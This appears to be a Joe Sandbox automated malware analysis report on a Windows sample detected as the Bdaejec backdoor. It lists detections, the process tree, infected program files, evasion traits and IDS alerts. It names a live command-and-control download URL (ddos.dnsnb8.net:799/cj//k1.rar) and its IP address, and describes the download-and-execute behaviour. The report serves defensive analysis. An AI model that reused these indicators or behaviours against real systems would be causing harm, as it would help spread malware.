Edit tour

Windows Analysis Report
ArjM1qx3hV.exe

Overview

General Information

Sample name:	ArjM1qx3hV.exe renamed because original name is a hash value
Original sample name:	2024-12-28_3840cfa13afb95c493fc98d766946229.exe
Analysis ID:	1581655
MD5:	3840cfa13afb95c493fc98d766946229
SHA1:	745322beeaaf28197f3949b5ee30929f827177e1
SHA256:	4feaa17c9b4a297a1fd51843a7f514d99c749a19bf46ab2968b48c6ccbd1d327
Tags:	backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

ArjM1qx3hV.exe (PID: 3812 cmdline: "C:\Users\user\Desktop\ArjM1qx3hV.exe" MD5: 3840CFA13AFB95C493FC98D766946229)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lhwmJX.exe (PID: 6052 cmdline: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: lhwmJX.exe PID: 6052	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\lhwmJX.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\lhwmJX.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\lhwmJX.exe, ParentCommandLine: "C:\Users\user\Desktop\ArjM1qx3hV.exe", ParentImage: C:\Users\user\Desktop\ArjM1qx3hV.exe, ParentProcessId: 3812, ParentProcessName: ArjM1qx3hV.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, ProcessId: 6052, ProcessName: lhwmJX.exe

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:25:59.786722+0100	2807908	1	Malware Command and Control Activity Detected	192.168.2.7	49699	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T12:25:58.540130+0100	2838522	1	Malware Command and Control Activity Detected	192.168.2.7	65067	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ArjM1qx3hV.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k1.raroC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcdp	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarp	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarm	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarf	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: ArjM1qx3hV.exe	Virustotal: Detection: 85%			Perma Link
Source: ArjM1qx3hV.exe	ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ArjM1qx3hV.exe

Joe Sandbox ML: detected

Source: ArjM1qx3hV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00BC29E2

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00BC2B8C

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.7:65067 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.7:49699 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49699 -> 799

Source: global traffic

TCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00BC1099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: lhwmJX.exe, 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmp, lhwmJX.exe, 00000002.00000003.1232301842.00000000008B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: lhwmJX.exe, 00000002.00000002.1583940679.000000000048E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcdp
Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarf
Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarm
Source: lhwmJX.exe, 00000002.00000002.1583940679.0000000000516000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000003.1253042614.0000000000516000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raroC:
Source: lhwmJX.exe, 00000002.00000002.1584584545.000000000226A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_fb8b9c81-4

System Summary

PE file contains section with special chars

Source: MyProg.exe.2.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: lhwmJX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_00407290	0_2_00407290
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_00417B71	0_2_00417B71
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Code function: 2_2_00BC6076	2_2_00BC6076
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Code function: 2_2_00BC6D00	2_2_00BC6D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\lhwmJX.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Code function: String function: 00403770 appears 32 times

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: ArjM1qx3hV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: lhwmJX.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: lhwmJX.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: lhwmJX.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@6/12@1/1

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_00BC119F

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6052
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

File created: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe

Jump to behavior

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ArjM1qx3hV.exe	Virustotal: Detection: 85%
Source: ArjM1qx3hV.exe	ReversingLabs: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\ArjM1qx3hV.exe "C:\Users\user\Desktop\ArjM1qx3hV.exe"
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Process created: C:\Users\user\AppData\Local\Temp\lhwmJX.exe C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 1520
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Process created: C:\Users\user\AppData\Local\Temp\lhwmJX.exe C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe	Jump to behavior

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Unpacked PE file: 2.2.lhwmJX.exe.bc0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Code function: 0_2_00409577 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_00409577

Source: initial sample

Static PE information: section where entry point is pointing to: ltu

Source: ArjM1qx3hV.exe	Static PE information: section name: ltu
Source: lhwmJX.exe.0.dr	Static PE information: section name: .aspack
Source: lhwmJX.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.2.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_00416E7B push ebp; ret	0_2_00416E7E
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_00416E85 push 00000000h; ret	0_2_00417296
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_004037B5 push ecx; ret	0_2_004037C8
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Code function: 2_2_00BC1638 push dword ptr [00BC3084h]; ret	2_2_00BC170E
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Code function: 2_2_00BC2D9B push ecx; ret	2_2_00BC2DAB
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Code function: 2_2_00BC6014 push 00BC14E1h; ret	2_2_00BC6425
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Code function: 2_2_00BC600A push ebp; ret	2_2_00BC600D

Source: ArjM1qx3hV.exe	Static PE information: section name: ltu entropy: 6.933946275224043
Source: lhwmJX.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.93450886047203
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.93438963759742
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.934228914959314

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	File created: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49699 -> 799

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
